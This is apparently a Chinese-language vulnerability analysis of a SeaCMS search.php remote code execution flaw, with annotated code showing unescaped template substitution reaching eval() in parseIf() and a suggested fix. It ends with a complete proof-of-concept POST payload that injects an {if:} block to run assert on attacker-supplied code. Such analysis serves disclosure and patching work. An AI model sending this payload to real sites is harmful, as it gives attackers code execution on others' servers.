漏洞触发点位于 search.php 第 211-213 行,对应下方代码清单中的第 38-40 行。
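// Excerpt from search.php (the enclosing function opens before this excerpt).
// It fills the search-page template held in $content and then hands the merged
// text to parseIf(). Where $tid, $jq, $area, $year, $yuyan, $letter, $state,
// $ver and $money come from is not visible here.
// NOTE(review): presumably they are request parameters - confirm in the caller.
if(intval($searchtype)==5)
{
    // Empty filters fall back to the label '全部' ("all").
    $tname = !empty($tid)?getTypeNameOnCache($tid):'全部';
    $jq = !empty($jq)?$jq:'全部';
    $area = !empty($area)?$area:'全部';
    $year = !empty($year)?$year:'全部';
    $yuyan = !empty($yuyan)?$yuyan:'全部';
    $letter = !empty($letter)?$letter:'全部';
    $state = !empty($state)?$state:'全部';
    $ver = !empty($ver)?$ver:'全部';
    $money = !empty($money)?$money:'全部';
    // SECURITY: these values are written into the template text as-is; no
    // escaping or stripping of template delimiters ("{", "}") is visible in this
    // excerpt. Whatever they contain is later scanned for {if:...} blocks by
    // parseIf(). Validate each filter against its expected format (numeric id,
    // year, single letter, known list) before substitution.
    $content = str_replace("{searchpage:type}",$tid,$content);
    $content = str_replace("{searchpage:typename}",$tname ,$content);
    $content = str_replace("{searchpage:year}",$year,$content);
    $content = str_replace("{searchpage:area}",$area,$content);
    $content = str_replace("{searchpage:letter}",$letter,$content);
    $content = str_replace("{searchpage:lang}",$yuyan,$content);
    $content = str_replace("{searchpage:jq}",$jq,$content);
    // $state and $money are mapped to fixed labels, so only constant strings
    // reach the template for these two placeholders.
    if($state=='w'){$state2="完结";}elseif($state=='l'){$state2="连载中";}else{$state2="全部";}
    if($money=='m'){$money2="免费";}elseif($money=='s'){$money2="收费";}else{$money2="全部";}
    $content = str_replace("{searchpage:state}",$state2,$content);
    $content = str_replace("{searchpage:money}",$money2,$content);
    $content = str_replace("{searchpage:ver}",$ver,$content);
    $content=$mainClassObj->parsePageList($content,"",$page,$pCount,$TotalResult,"cascade");
    $content=$mainClassObj->parseSearchItemList($content,"type");
    $content=$mainClassObj->parseSearchItemList($content,"year");
    $content=$mainClassObj->parseSearchItemList($content,"area");
    $content=$mainClassObj->parseSearchItemList($content,"letter");
    $content=$mainClassObj->parseSearchItemList($content,"lang");
    $content=$mainClassObj->parseSearchItemList($content,"jq");
    $content=$mainClassObj->parseSearchItemList($content,"state");
    $content=$mainClassObj->parseSearchItemList($content,"ver");
    $content=$mainClassObj->parseSearchItemList($content,"money");
}else
{
    $content=$mainClassObj->parsePageList($content,"",$page,$pCount,$TotalResult,"search");
}
// Listing lines 38-40 (search.php lines 211-213 according to the article).
// In this excerpt the three calls run after BOTH branches above, so a fix
// must not be limited to searchtype 5.
$content=replaceCurrentTypeId($content,-444);
// SECURITY: parseIf() evaluates {if:...} conditions found in $content with
// eval(); by this point $content already contains the substituted values.
$content=$mainClassObj->parseIf($content);
$content=str_replace("{seacms:member}",front_member(),$content);
$searchPageStr = $content;
echo str_replace("{seacms:runinfo}",getRunTime($t1),$searchPageStr) ;
} // closes the enclosing function, whose opening is outside this excerpt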
跟进parseIf 函数 ./include/main.class.php
这里要注意清单第 21 行的位置:可以看到 eval 直接执行拼接出来的条件字符串,没有做任何安全处理。
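/**
 * Expands {if:COND}...{else}...{end if} / {elseif:COND} template blocks in
 * $content and returns the text with each block replaced by the chosen branch.
 *
 * SECURITY: every condition is turned into PHP source and run through eval().
 * The conditions are taken from $content by regex, so any text merged into
 * $content before this call (see the caller) is treated as code if it contains
 * template delimiters. parseStrIf()/parseSubIf() are not shown here.
 * NOTE(review): confirm whether they filter anything - the article states they
 * do not. Recommended fix: evaluate conditions with a small parser for a fixed
 * comparison grammar instead of eval(), and reject "{" / "}" in request values
 * before they are substituted into the template.
 *
 * @param string $content template text after placeholder substitution
 * @return string $content with the if-blocks resolved
 */
function parseIf($content){
    // Nothing to do when the page holds no {if: tag.
    if (strpos($content,'{if:')=== false){
        return $content;
    }else{
        // buildregx() is defined elsewhere; presumably it wraps the pattern in
        // delimiters and applies the "is" modifiers - verify.
        $labelRule = buildregx("{if:(.*?)}(.*?){end if}","is");
        $labelRule2="{elseif";
        $labelRule3="{else}";
        // $iar[0] = whole block, $iar[1] = condition, $iar[2] = body.
        preg_match_all($labelRule,$content,$iar);
        $arlen=count($iar[0]);
        $elseIfFlag=false;
        for($m=0;$m<$arlen;$m++){
            $strIf=$iar[1][$m];
            $strIf=$this->parseStrIf($strIf);
            $strThen=$iar[2][$m];
            $strThen=$this->parseSubIf($strThen);
            if (strpos($strThen,$labelRule2)===false){
                // NOTE(review): strpos() returns false when "{else}" is absent
                // and false>=0 is true in PHP, so this test always passes and
                // the else branch below is unreachable. "!== false" was
                // probably intended.
                if (strpos($strThen,$labelRule3)>=0){
                    $elsearray=explode($labelRule3,$strThen);
                    $strThen1=$elsearray[0];
                    // Undefined index when the body has no "{else}".
                    $strElse1=$elsearray[1];
                    // Listing line 21 - SECURITY: $strIf is concatenated into
                    // PHP source and executed; "@" additionally hides errors.
                    @eval("if(".$strIf."){\$ifFlag=true;}else{\$ifFlag=false;}");
                    if ($ifFlag){ $content=str_replace($iar[0][$m],$strThen1,$content);} else {$content=str_replace($iar[0][$m],$strElse1,$content);}
                }else{
                    // SECURITY: same eval() pattern as above.
                    @eval("if(".$strIf.") { \$ifFlag=true;} else{ \$ifFlag=false;}");
                    if ($ifFlag) $content=str_replace($iar[0][$m],$strThen,$content); else $content=str_replace($iar[0][$m],"",$content);}
            }else{
                // Body contains at least one {elseif: - split it into segments.
                $elseIfArray=explode($labelRule2,$strThen);
                $elseIfArrayLen=count($elseIfArray);
                $elseIfSubArray=explode($labelRule3,$elseIfArray[$elseIfArrayLen-1]);
                // Default result is the text after {else}.
                $resultStr=$elseIfSubArray[1];
                // SECURITY: addslashes() escapes quotes and backslashes but not
                // "$", so the double-quoted literal built below is still
                // subject to PHP variable interpolation inside eval().
                $elseIfArraystr0=addslashes($elseIfArray[0]);
                @eval("if($strIf){\$resultStr=\"$elseIfArraystr0\";}");
                for($elseIfLen=1;$elseIfLen<$elseIfArrayLen;$elseIfLen++){
                    // getSubStrByFromAndEnd() is defined elsewhere; it appears to
                    // cut the condition (":" to "}") and the text after "}".
                    $strElseIf=getSubStrByFromAndEnd($elseIfArray[$elseIfLen],":","}","");
                    $strElseIf=$this->parseStrIf($strElseIf);
                    $strElseIfThen=addslashes(getSubStrByFromAndEnd($elseIfArray[$elseIfLen],"}","","start"));
                    // SECURITY: the condition is evaluated twice via eval().
                    @eval("if(".$strElseIf."){\$resultStr=\"$strElseIfThen\";}");
                    @eval("if(".$strElseIf."){\$elseIfFlag=true;}else{\$elseIfFlag=false;}");
                    if ($elseIfFlag) {break;}
                }
                $strElseIf0=getSubStrByFromAndEnd($elseIfSubArray[0],":","}","");
                $strElseIfThen0=addslashes(getSubStrByFromAndEnd($elseIfSubArray[0],"}","","start"));
                // A lone "=" in the condition is rewritten to "==" before it is evaluated.
                if(strpos($strElseIf0,'==')===false&&strpos($strElseIf0,'=')>0)$strElseIf0=str_replace('=', '==', $strElseIf0);
                // SECURITY: $strElseIf0 does not pass through parseStrIf() before eval().
                @eval("if(".$strElseIf0."){\$resultStr=\"$strElseIfThen0\";\$elseIfFlag=true;}");
                $content=str_replace($iar[0][$m],$resultStr,$content);
            }
        }
        return $content;
    }
}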
这里我们要注意触发的条件:请求要依次经过下面这些判断,才会走到 parseIf 中第 21 行的 eval。
1.if(intval($searchtype)==5)
2.if (strpos($content,'{if:')=== false)(该判断需不成立,即 $content 中必须含有 {if: 标签,否则函数直接返回)
3.{if:(.*?)}(.*?){end if}
4.if (strpos($strThen,$labelRule2)===false)
5.if (strpos($strThen,$labelRule3)>=0){(strpos 返回 false 时,false>=0 在 PHP 中同样为真,因此该判断恒成立)
POC
http://127.0.0.1/search.php?searchtype=5 POST: searchword=d&order=}{end if}{if:1)print_r($_POST[func]($_POST[cmd]));//}{end if}&func=assert&cmd=phpinfo();{end if}{if:1)print_r($_POST[func]($_POST[cmd]));//}{end if}&fun
c=assert&cmd=phpinfo();
原文地址:http://www.cnblogs.com/sqyysec/p/7765703.html